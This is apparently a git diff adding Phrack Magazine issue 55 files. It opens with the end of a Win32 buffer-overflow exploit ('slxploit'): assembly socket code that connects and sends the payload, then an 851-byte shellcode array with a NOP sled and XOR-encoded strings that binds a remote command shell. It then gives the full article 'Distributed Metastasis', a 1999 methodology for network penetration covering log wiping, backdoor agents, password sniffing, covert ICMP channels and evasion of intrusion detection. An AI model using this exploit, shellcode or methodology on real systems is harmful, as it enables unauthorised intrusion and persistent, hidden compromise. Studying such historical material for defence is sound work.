+	jnz     gothost
+
+	push    reshostl
+	push    offset reshost
+	call    write_console
+	jmp     quit1
+
+gothost:
+	mov     eax, [eax+0ch]
+	mov     eax, [eax]
+	mov     eax, [eax]
+	mov     sin.sin_addr, eax
+
+continue:
+	push    size sin
+	push    offset sin
+	push    sock
+	call    connect
+	or      eax, eax
+	jz      connect_ok
+	push    cnerrorl
+	push    offset cnerror
+	call    write_console
+	jmp     quit1
+
+connect_ok:
+	push    respl
+	push    offset response
+	call    write_console
+	
+	xor     eax, eax
+	push    eax
+	push    1000
+	push    offset buffer
+	push    sock
+	call    recv
+	or      eax, eax
+	jg      sveet
+
+	push    derrorl        
+	push    offset derror
+	call    write_console
+	jmp     quit1
+
+sveet:        
+	push    eax
+	push    offset buffer
+	call    write_console
+
+	xor     eax, eax
+	push    eax
+	push    sploit_length
+	push    offset sploit
+	push    sock
+	call    send
+	push    successl
+	push    offset success
+	call    write_console
+
+quit1:
+	push    sock
+	call    closesocket
+quit2:
+	call    WSACleanup
+quit3:
+	push    0
+	call    ExitProcess
+parse   proc
+;cheap parsing.. 
+lewp9:
+	xor     eax, eax
+	cld
+	lodsb
+	cmp     al, 20h
+	jz      done
+	test    al, al
+	jz      done2
+	stosb
+	dec     ecx
+	jmp     lewp9
+done:
+	dec     ecx
+done2:
+	ret
+endp
+
+str2num proc
+	push    eax ecx edi
+	xor     eax, eax
+	xor     ecx, ecx
+	xor     edx, edx
+	xor     edi, edi
+lewp2:
+	xor     al, al
+	xlat
+	test    al, al
+	jz      end_it
+	sub     al, 030h
+	mov     cl, al
+	mov     eax, edx
+	mul     numbase
+	add     eax, ecx
+	mov     edx, eax
+	inc     ebx
+	inc     edi
+	cmp     edi, 0ah
+	jnz     lewp2
+
+end_it:
+	pop     edi ecx eax
+	ret
+endp
+
+init_console  proc
+	push    -10
+	call    GetStdHandle
+	or      eax, eax
+	je      init_error
+	mov     [console_in], eax
+	push    -11
+	call    GetStdHandle
+	or      eax, eax
+	je      init_error
+	mov     [console_out], eax
+	ret
+init_error:
+	push    0
+	call    ExitProcess
+endp
+
+write_console proc    text_out:dword, text_len:dword
+	pusha
+	push    0
+	push    offset bytes_read 
+	push    text_len          
+	push    text_out          
+	push    console_out       
+	call    WriteConsoleA
+	popa
+	ret
+endp
+
+end     start
+
+;--(code ends)------------------------------------------------------------
+<-->
+Here is the shellcode in c format:
+
+<++> P55/Win32-overflows/slxploit-shellcode.c !f4bcdaf5
+#define sploit_length 851
+
+unsigned char sploit[851] = {
+  0x65, 0x78, 0x70, 0x6e, 0x20, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+  0x90, 0x90, 0xeb, 0x07, 0x90, 0xaa, 0x1c, 0x9c, 0x77, 0x90, 0x90, 0x90,
+  0x33, 0xc0, 0x50, 0xf7, 0xd0, 0x50, 0x59, 0xf2, 0xaf, 0x59, 0xb1, 0xc6,
+  0x8b, 0xc7, 0x48, 0x80, 0x30, 0x99, 0xe2, 0xfa, 0x33, 0xf6, 0x96, 0xbb,
+  0x99, 0x10, 0x11, 0x44, 0xc1, 0xeb, 0x08, 0x56, 0xff, 0x13, 0x8b, 0xd0,
+  0xfc, 0x33, 0xc9, 0xb1, 0x0b, 0x49, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75,
+  0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0x0c, 0xff, 0x13, 0xab, 0x59, 0x5a,
+  0xe2, 0xec, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75, 0xf9, 0xb3, 0x10, 0x56,
+  0xff, 0x13, 0x8b, 0xd0, 0xfc, 0x33, 0xc9, 0xb1, 0x06, 0x32, 0xc0, 0xac,
+  0x84, 0xc0, 0x75, 0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0x0c, 0xff, 0x13,
+  0xab, 0x59, 0x5a, 0xe2, 0xec, 0x83, 0xc6, 0x05, 0x33, 0xc0, 0x50, 0x40,
+  0x50, 0x40, 0x50, 0xff, 0x57, 0xe8, 0x93, 0x6a, 0x10, 0x56, 0x53, 0xff,
+  0x57, 0xec, 0x6a, 0x02, 0x53, 0xff, 0x57, 0xf0, 0x33, 0xc0, 0x57, 0x50,
+  0xb0, 0x0c, 0xab, 0x58, 0xab, 0x40, 0xab, 0x5f, 0x48, 0x50, 0x57, 0x56,
+  0xad, 0x56, 0xff, 0x57, 0xc0, 0x48, 0x50, 0x57, 0xad, 0x56, 0xad, 0x56,
+  0xff, 0x57, 0xc0, 0x48, 0xb0, 0x44, 0x89, 0x07, 0x57, 0xff, 0x57, 0xc4,
+  0x33, 0xc0, 0x8b, 0x46, 0xf4, 0x89, 0x47, 0x3c, 0x89, 0x47, 0x40, 0x8b,
+  0x06, 0x89, 0x47, 0x38, 0x33, 0xc0, 0x66, 0xb8, 0x01, 0x01, 0x89, 0x47,
+  0x2c, 0x57, 0x57, 0x33, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50,
+  0x50, 0xad, 0x56, 0x33, 0xc0, 0x50, 0xff, 0x57, 0xc8, 0xff, 0x76, 0xf0,
+  0xff, 0x57, 0xcc, 0xff, 0x76, 0xfc, 0xff, 0x57, 0xcc, 0x48, 0x50, 0x50,
+  0x53, 0xff, 0x57, 0xf4, 0x8b, 0xd8, 0x33, 0xc0, 0xb4, 0x04, 0x50, 0xc1,
+  0xe8, 0x04, 0x50, 0xff, 0x57, 0xd4, 0x8b, 0xf0, 0x33, 0xc0, 0x8b, 0xc8,
+  0xb5, 0x04, 0x50, 0x50, 0x57, 0x51, 0x50, 0xff, 0x77, 0xa8, 0xff, 0x57,
+  0xd0, 0x83, 0x3f, 0x01, 0x7c, 0x22, 0x33, 0xc0, 0x50, 0x57, 0xff, 0x37,
+  0x56, 0xff, 0x77, 0xa8, 0xff, 0x57, 0xdc, 0x0b, 0xc0, 0x74, 0x2f, 0x33,
+  0xc0, 0x50, 0xff, 0x37, 0x56, 0x53, 0xff, 0x57, 0xf8, 0x6a, 0x50, 0xff,
+  0x57, 0xe0, 0xeb, 0xc8, 0x33, 0xc0, 0x50, 0xb4, 0x04, 0x50, 0x56, 0x53,
+  0xff, 0x57, 0xfc, 0x57, 0x33, 0xc9, 0x51, 0x50, 0x56, 0xff, 0x77, 0xac,
+  0xff, 0x57, 0xd8, 0x6a, 0x50, 0xff, 0x57, 0xe0, 0xeb, 0xaa, 0x50, 0xff,
+  0x57, 0xe4, 0x90, 0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
+  0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
+  0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
+  0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
+  0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
+  0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
+  0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
+  0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
+  0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
+  0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
+  0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
+  0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
+  0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
+  0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
+  0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99, 
+  0x00, 0x00, // word value for bind port, client must mod and XOR with 0x99
+  0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 
+  0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff, 
+  0x0d, 0x0a};
+<-->
+----[  EOF
diff --git a/phrack55/16.txt b/phrack55/16.txt
new file mode 100644
index 0000000..d182127
--- /dev/null
+++ b/phrack55/16.txt
@@ -0,0 +1,658 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 16 of 19  ]
+
+
+-------------------------[  Distributed Metastasis:
+                            A Computer Network Penetration Methodology
+
+-------[  Andrew J. Stewart <ajs@tentacle.org.uk>
+ 
+
+
+"You may advance and be absolutely irresistible, if you make for the enemy's
+weak points; you may retire and be safe from pursuit if your movements are more
+rapid than those of the enemy."
+
+- Sun Tzu, Art of War
+
+
+----[  (struct phrack *)ptr;
+
+You can find the original instance of this article in both Adobe .pdf and
+Microsoft Word 97 format at http://www.packetfactory.net.
+
+
+----[  Abstract
+
+Metastasis refers to the process by which an attacker propagates a computer
+penetration throughout a computer network.  The traditional methodology for
+Internet computer penetration is sufficiently well understood to define
+behavior which may be indicative of an attack, e.g. for use within an Intrusion
+Detection System.  A new model of computer penetration: distributed metastasis,
+increases the possible depth of penetration for an attacker, while minimizing
+the possibility of detection.  Distributed Metastasis is a non-trivial
+methodology for computer penetration, based on an agent based approach, which
+points to a requirement for more sophisticated attack detection methods and
+software to detect highly skilled attackers.
+
+
+----[  Introduction
+
+In the study of medicine, the term "metastasis" refers to the spread of cancer
+from its original site to other areas in the body.  Metastasis is the principal
+cause of death in cancer patients.  Cancer cells have the ability to enter the
+vascular system and travel to virtually any part of the body where they detach
+and burrow into a target organ.  Each cancer has an individualized way of
+spreading.
+
+The use of the term metastasis was first suggested in the context of computer
+security by William Cheswick and Steven Bellovin [1] and refers to the process
+by which an attacker, after compromising a computer host, attacks logically
+associated hosts by utilizing properties and resources of the compromised host:
+
+"Once an account is secured on a machine, the hacker has several hacking goals
+... [to] open new security holes or backdoors in the invaded machine ... [and
+to] find other hosts that trust the invaded host."
+
+Before the techniques and advantages of distributed metastasis can be
+explained,the traditional attack paradigm must be understood. Note that a
+verbose description of the traditional attack paradigm is outside the scope of
+this document; [2] describes that subject in detail.
+
+
+----[  Traditional Attack Paradigm
+
+The framework of processes and order of execution by which an attacker attempts
+to penetrate a remote computer network is sufficiently well understood to
+enable the creation of toolkits to attempt to exploit a weakness and/or to
+attempt to audit a system for potential weaknesses.
+
+The tasks an attacker performs to conventionally execute an attack can be
+categorized as 'information gathering', 'exploitation', and 'metastasis', and
+are described below.
+
+
+----[  Information Gathering
+
+The first phase of an attack, the information gathering phase, comprises the
+determination of the characteristics of the target network such as network
+topology, host OS type (within this paper the term 'host' will refer to a
+generic network entity such as a workstation, server, router, etc.), and
+"listening" applications e.g. WWW servers, FTP services, etc.  This is
+ordinarily achieved by applying the following techniques:
+
+I.     Host Detection
+
+Detection of the availability of a host.  The traditional method is to elicit
+an ICMP ECHO_REPLY in response to an ICMP ECHO_REQUEST using the 'ping'
+program.  Programs designed to perform host detection in parallel such as fping
+[3] enable large expanses of IP address space to be mapped quickly.
+
+II.    Service Detection
+
+a.k.a. "port scanning".  Detection of the availability of a TCP, UDP, or RPC
+service, e.g. HTTP, DNS, NIS, etc.  Listening ports often imply associated
+services, e.g. a listening port 80/tcp often implies an active web server.
+
+III.   Network Topology Detection
+
+Topology in this context relates to the relationship between hosts in terms of
+'hop count' ("distance" between hosts at the Internet/IP layer).
+
+Only two methods of network topology detection are known to the author: 'TTL
+modulation' and 'record route'.  The UNIX 'traceroute' program performs network
+topology detection by modulating the TTL (time to live) field within IP
+packets;  in the windows NT environment, tracert.exe provides broadly
+equivalent functionality.  'ping' can be used to "record [the] route" of ICMP
+packets, albeit to a finite depth.  Both these techniques require a target host
+to act as the final destination of the probe.
+
+Firewalk [4] is a technique used to perform both network topology detection and
+service detection for hosts "protected" behind certain vulnerable
+configurations of gateway access control lists, e.g. as implemented in a
+firewall or screening router.
+
+Classical promiscuous-mode "network sniffing" is another, albeit non-invasive,
+method of network topology detection [5], but may not be applicable in
+those scenarios where traffic from the target network is not visible to an
+attacker at their initial network location.
+
+IV.    OS Detection
+
+A common OS detection technique is "IP stack fingerprinting" - the
+determination of remote OS type by comparison of variations in OS IP stack
+implementation behavior.  Ambiguities in the RFC definitions of core internet
+protocols coupled with the complexity involved in implementing a functional IP
+stack enable multiple OS types (and often revisions between OS releases) to be
+identified remotely by generating specifically constructed packets that will
+invoke differentiable but repeatable behavior between OS types, e.g. to
+distinguish between Sun Solaris and Microsoft Windows NT.
+
+The pattern of listening ports discovered using service detection techniques
+may also indicate a specific OS type;  this method is particularly applicable
+to "out of the box" OS installations.
+
+V.     Application-Layer Information Gathering
+
+Applications running on target hosts can often be manipulated to perform
+information gathering.  SNMP (Simple Network Management Protocol) enabled 
+devices are often not configured with security in mind, and can consequently be
+queried for network availability, usage, and topology data.  Similarly, DNS
+servers can be queried to build lists of registered (and consequently likely
+active) hosts.
+
+Routers on (or logically associated with) the target network can often be
+queried via the RIP protocol for known routes [6]. This information can be used
+to further aid construction of a conceptual model of the topology of the target
+network.
+
+Many of these techniques are utilized by modern network management software to
+"map" a network.
+
+In summary, the information gathering phase of an attack comprises the
+determination of host availability: "what hosts are 'alive'?", service
+availability: "what network enabled programs run on those hosts?", network
+topology: "how are hosts organized?", and roles: "what 'jobs' do each host
+perform?".
+
+
+----[  Exploitation
+
+The exploitation phase of an attack is the initial chronological point at
+which an attacker commits to attempting to penetrate an individual host.
+
+The data generated in the information gathering phase of the attack is used to
+determine if any hosts on the target network are running a network service
+which has a known vulnerable condition that might be remotely exploitable.
+Services may either be intrinsically insecure "out of the box" or may become
+insecure through misconfiguration.
+
+The methods by which a service can be exploited vary widely, but the end-result
+often manifests as either the execution of a process in a privileged context
+e.g. opening a privileged command line, adding an account with no password,
+etc., or through the disclosure of security-critical information, e.g. a list
+of encrypted passwords which can (possibly) subsequently be "cracked".  The
+observed proportion of weak passwords within a password file [7] imply that a
+password cracking attack is likely to be successful.
+
+To summarize, the exploitation phase of an attack involves the compromise of a
+vulnerable host on (or logically associated with) the target network.
+
+
+----[  Metastasis
+
+
+The metastasis phase of the attack, as defined by Cheswick and Bellovin, can
+be logically separated into two key components: 'consolidation', and
+'continuation', described here:
+
+I.     Consolidation Component
+
+Once access has been gained to an individual host, the attack proceeds with the
+consolidation component of metastasis.
+
+It is imperative to the attacker that the exploitation phase not be detected.
+The attacker must remove evidence of the entry onto the host by removing
+relevant entries from OS and security application log files.  If the
+opportunity exists, the attacker will remove any trace generated by the earlier
+information gathering phase also.
+
+Depending on the exploit employed, the exploitation phase may not have granted
+the attacker the highest level of privilege on the compromised system ('root'
+for UNIX derivatives, 'Administrator' for Windows NT), and if not, the attacker
+will attempt to escalate their privilege to the highest level.  The methods
+used to escalate local privilege level often employ extremely similar
+techniques, even across multiple OS platforms.  Such vulnerabilities reoccur
+frequently due to non security-cognizant OS and application programming.  A
+notable category of local exploit is a "buffer overflow" [8].
+
+A program to enable remote unauthorized access is traditionally installed,
+sometimes called a "back door".  A back door "listens" identically to a network
+daemon/service, and provides either full remote command line access or a set of
+specific actions e.g. upload/download file, execute/terminate process, etc.
+
+In summary, the goals of the consolidation component of the metastasis phase of
+an attack, are to remove any evidence of the exploitation phase, and to ensure
+that remote access is available to the attacker.
+
+II.    Continuation Component
+
+The continuation component of metastasis is the most conceptually interesting
+and challenging, in terms of attempting to construct a model of the attackers
+actions.
+
+Because a host on the target network has been compromised, the attacker can now
+utilize 'passive' as well as the previous described 'active' attack methods to
+deepen the penetration.  Traditionally, a "password sniffer" is installed - a
+promiscuous mode network protocol monitor, designed to log the usernames and
+passwords associated with those application layer protocols that utilize plain
+text transmission, e.g. Telnet, FTP, rlogin, etc.
+
+Implicit to modern enterprise network environments is the concept of trust.
+[9] defines trust as:
+
+"[the] situation when a ... host ... can permit a local resource to be used by
+a client without password authentication when password authentication is
+normally required."
+
+Metastasis involves the use/abuse of trust relationships between a compromised
+host and other prospective target hosts.
+
+Regardless of OS type, a host is likely to engage in multiple trust
+relationships, often in the areas of authentication, authorization, remote
+access, and shared resources.  The process of trust relationship exploitation
+involves identifying and "following" trust relationships that exist on a
+compromised host, in order to deepen a penetration.  There is often no need to
+perform the exploitation stage of an attack against other hosts on the target
+network if they already implicitly trust the compromised host in some way.
+
+The classical example of trust relationship exploitation involves the
+subversion of the Berkley "R" commands and their configuration files in the
+UNIX environment: '.rhosts' and '/etc/hosts.equiv'.
+
+
+----[  Properties of the Traditional Attack Paradigm
+
+
+    It is valuable to identify those properties that define the traditional
+attack paradigm, as outlined above.
+
+I.     One to One, One to Many Model
+
+Information gathering techniques are traditionally performed using a "one to
+one" or "one to many" model;  an attacker performs network operations against
+either one target host or a logical grouping of target hosts (e.g. a subnet).
+
+This process is ordinarily executed in a linear way, and is often optimized for
+speed by utilizing parallel or multi-threaded program execution.
+
+This linear process can be visualized using a conceptually simplified network
+topology diagram.  Fig 1 shows attacker host A1 "attacking" (i.e. performing
+the host and/or service detection phases of an attack) against a single target
+host T1.
+
+                                 A1 -------> T1
+
+                            Fig 1. One to One Model
+
+Fig 2 shows attacker host A1 attacking multiple target hosts T1 ... Tn.
+
+                                 A1 -------> T1
+                                 A1 -------> T2
+                                 . 
+                                 . 
+                                 . 
+                                 A1 -------> Tn
+
+                            Fig 2. One to Many Model
+
+Note that although the concepts of "one to one", "one to many", etc., are
+simplistic - they are particularly relevant and important to modeling the
+network activity generated by an attacker as they metastasize across a network.
+
+II.    Server Centricity
+
+Traditional, remote exploitation techniques target a server program by
+approximating a client because, by definition [10]: 
+
+"the client/server message paradigm specifies that a server provides a service
+that a client may request ... the attacker (client) makes a request (attack) to
+any server offering the service and may do so at any point."
+
+Server programs typically run with elevated privileges and are therefore
+advantageous targets for attack;  this conveniently maps to the "one to one"
+and "one to many" models described in I.
+
+III.   Attack Chaining
+
+The traditional attack process is often chained from compromised host to host
+in an attempt to obscure the "real" location of an attacker.  Fig 3 shows an
+attack on target host T1 from attacking host A1 in which the attacker is
+logically located at host H1, and is connected to A1 through host H2;  only the
+connection from A1 can be "seen" from T1.
+
+                     H1 -------> H2 -------> A1 -------> T1
+
+                            Fig 3. Attack Chaining
+
+IV.    Latency
+
+Because password sniffer log files are traditionally written to disk, an
+attacker must return to a compromised host to collect information that could
+enable the depth of the penetration to be increased.
+
+Similarly, an attacker must return to a compromised host in order to proxy
+(chain) the attack process.
+
+
+----[  Distributed Metastasis
+
+These properties that define the traditional attack paradigm can be evolved.
+
+The core of the distributed metastasis methodology is a desire to utilize the
+distributed, client/server nature of the modern IP network environment, and to
+perform a logical automation of the metastasis phase of the traditional attack
+process.
+
+The impetus for the distributed metastasis approach comes from the observation
+of commercial "network enabled" security technology.
+
+Manufacturers of security software tools have, in the majority, evolved their
+products from a stand-alone model (single host e.g. COPS [11]) to a distributed
+one - in which multiple embedded agents reside on topologically disparate
+hosts, and communicate security-relevant information to a logically centralized
+"manager".  This strategy is advantageous in terms of:
+
+I.     Scalability
+
+The agent population is almost certainly fluid in nature - agents can be added
+and removed over time, but the manager remains constant.  This model maps to
+the most common operating environment - the infrastructure is malleable but the
+security monitoring function (hopefully) remains stable.
+
+II.    Cost of Ownership
+
+The impact of performing a single installation of an agent on a host is less
+costly over time in both physical and administrative terms than with repeated
+visitation.
+
+Agents that can be remotely "programmed" (i.e. instructed how to perform) from
+a remote location enable the function of the security software to be changed
+more rapidly throughout the enterprise (such as with a security policy change),
+than with multiple per-host installations.
+
+III.   Coverage
+
+By utilizing multiple automated, semi or fully autonomous agents, that can
+either be scheduled to perform security analysis regularly or run continuously,
+the depth of agent coverage is increased, and consequently the probability of
+detecting anomalous (i.e. security relevant) behavior is increased.
+
+Although security vendors understand the functional requirements associated
+with large infrastructures in terms of scalability and cost of ownership, these
+properties have not yet been fully leveraged by the attacker community in
+extending the traditional attack methodology.
+
+
+----[  Properties of Distributed Metastasis
+
+A distributed, agent based approach, can be utilized in the metastasis phase
+of the traditional attack methodology to reap appreciable benefits for an
+attacker.
+
+The properties that define distributed metastasis are as follows:
+
+I.     Agent Based
+
+The "back door" traditionally installed as part of the consolidation stage is,
+with distributed metastasis, a remotely controllable agent in a similar vein to
+those employed by network enabled security tools.
+
+The attacker will never "log in" in the traditionally sense to a compromised
+host once an agent is installed.  This approach brings time saving advantages
+to an attacker because the log-file "clean up" operation involved with a
+conventional login does not have to be repeated ad infinitum.
+
+II.    Many to One, Many to Many Model
+
+Whereas the traditional attack paradigm conventionally employs a "one to one"
+or "one to many" model of information gathering, the use of multiple
+distributed agents facilitates "many to one" and "many to many" models also.
+
+A custom client can deliver a "task definition" to an agent which defines a
+host and/or service detection task.  An agent can return the results to a
+client either in (pseudo) real time or on task completion.
+
+For execution of host and service detection techniques that require low-level
+packet forgery (e.g. to enable a SYN port scan), the availability of a portable
+network packet generation library [12] eases the development time required to
+implement this functionality.
+
+As described in [13], the ability to utilize multiple source hosts for
+gathering host, service, and network topology information has advantages in the
+areas of stealth, correlation, and speed.
+
+Fig 4 and Fig 5 illustrate multiple source hosts (agents) used to perform
+information gathering in "one to many" and "many to many" scenarios
+respectively:
+
+                                 A1 -------> T1
+                                 A2 -------> T1
+                                 .
+                                 .
+                                 .
+                                 An -------> T1
+
+                            Fig 3. Many to One Model
+
+                                 A1 -------> T1 ... Tn
+                                 A2 -------> T1 ... Tn
+                                 .
+                                 .
+                                 .
+                                 An -------> T1 ... Tn
+
+                            Fig 5. Many to Many Model
+
+Agents can be remotely programmed either to execute or to forward scan
+definitions to functionally duplicate the "chaining" present in the
+traditional attack approach.
+
+Although an agent based approach is not implicitly required for "many to one"
+and "many to many" models of information gathering, it is made substantially
+easier through a programmatic approach.  The ability of an agent to multiplex
+scan definitions allows an attacker to have topological control over which
+links in the network attack-related network traffic flows.
+
+III.   Real Time Monitoring
+
+As described previously, delay exists when an attacker wishes to utilize a
+compromised host for further attacks and to collect log files from data
+collection programs such as password sniffers and keystroke recorders.
+
+With a distributed model, collected data such as username/password pairs can be
+transferred in (pseudo) real time to a remote location, and as shown, this
+process can be chained through multiple compromised hosts.
+
+Embedded password sniffing functionality could be extended to support
+regular-expression style pattern matching which again, because of the benefits
+of the agent based approach, would be remotely programmable.
+
+Conceptually, there is no limit to the amount or type of data that could be
+collected and forwarded by agents.  Possible areas of interest to an attacker
+might include patterns of user activity and host and network utilization
+metrics.
+
+IV.    Minimal Footprint
+
+In the traditional attack paradigm (albeit dependent on the "back door"
+employed), the attacker is exposed to a window of possible detection when the
+attacker re-enters a previously compromised host, between a login and the
+removal of the evidence of the login.  With an agent based approach, the
+consolidation phase need never be repeated after the agent installation.
+
+V.     Communication
+
+Covert channels between agents and managers and between agents can be created
+by utilizing steganography techniques. [14] describes the ubiquitous nature of
+ICMP network traffic to TCP/IP networks, and that it can subsequently be used
+to tunnel information which (superficially) appears benign.
+
+By utilizing such a ubiquitous transport, the ability to communicate between
+widely disparate agents is less likely to be affected by network devices that
+implement network traffic policy enforcement, e.g. screening routers,
+firewalls, etc.
+
+Confidentiality and integrity can be added using Cryptography.
+
+VI.    Client Centricity
+
+The structure of the traditional attack methodology lends itself to server
+centric attacks - attacks which attempt to subvert a server by approximating a
+client.  With a distributed approach in which an embedded agent resides on a
+server, client requests to that server can consequently be intercepted and
+subverted.
+
+
+----[  Monoculture
+
+As described, fundamentally, distributed metastasis advocates an agent based
+approach.  The logical implication is that an attacker must construct a
+functional agent for each OS variant that is likely to be encountered in the
+target environment (and which it is considered desirable to compromise).
+Admittedly, this requires initial time and intellectual investment by an
+attacker; however, the predominance of "monoculture" IT environments simplifies
+this task.  Also, cross-platform programming languages such as Java make
+cross-platform operability realizable.
+
+In the fields of ecology and biology, "monoculture" refers to the dominance of
+a single species in an environment - a state considered to be pathologically
+unstable.  Economies of scale make monoculture installations attractive -
+greater short term efficiency is likely to be achieved, and therefore the
+majority of large organizations tend towards monoculture installations that
+employ one or two key OS types.
+
+
+----[  Internet Worm Analogy
+
+The distributed metastasis approach shares similarities to the propagation
+method used by the Internet "worm" [15] - the proliferation of remote agents.
+Once an instance of the Internet worm infected a host, it attempted to
+communicate with an external entity, although this was later thought to be a
+deliberate attempt at throwing those people attempting to reverse engineer the
+worm "off the scent".
+
+A combined attack form in which a worm was used as a vector to seed agents
+which can then be remotely controlled would increase the speed of penetration,
+but would likely be less controllable, unless the worm was specifically
+targeted and rate limited in terms of expansion - perhaps using a "proximity
+control" mechanism similar to that employed by the SATAN network vulnerability
+scanner [16].
+
+
+----[  A Challenge for State and Event Monitoring
+
+Would todays state and event monitoring tools detect a distributed metastasis
+attack?  Clearly, the answer is dependent on the proliferation, sophistication,
+and configuration of those tools within the target environment.
+
+If an attacker can compromise a host and remove evidence of the attack, state
+monitoring tools will not detect the hostile activity if it falls between those
+scheduled times when the tool performs its sweep.  Host based IDS, dependent on
+the exploitation and privilege escalation method used by an attacker, may
+detect the attack.  Clearly therefore, a combination of state monitoring and
+real time state monitoring (a.k.a. intrusion detection) tools should both be 
+employed within a technical security architecture.
+
+"Many to Many" and "Many to One" attacks are less likely to be detected by
+network based intrusion detection systems (N-IDS) than with a linear model.
+The techniques described in [17] can be implemented to assist evasion of N-IDS.
+
+As discussed, with an agent based approach, once an agent is installed and
+hidden, the intrusion is less likely to be detected than with continual
+re-visitation of a host (e.g. with Telnet) as in the traditional attack
+methodology. If an agent can be installed and hidden, if it is not detected at
+an early stage it is unlikely to be discovered from that point forward.
+
+For "open source" OS' (e.g. OpenBSD, Linux, etc.) an agent could even be 
+incorporated into the kernel itself.  Similarly, any OS that enables loading
+of run-time kernel modules could be compromised in this way.
+
+Polymorphic techniques could perhaps be implemented to increase the complexity
+of detection (cf. polymorphic strains of virus).
+
+
+----[  A New Architecture for Vulnerability Scanning
+
+There exists several advantages in using a distributed agent model for
+commercial vendors of network vulnerability scanning technology. A distributed
+model would enable localized 'zones of authority' (i.e. delegation of
+authority), would facilitate information gathering behind NAT (and firewalls,
+where configured), and overcome network topology specific bandwidth
+restrictions.
+
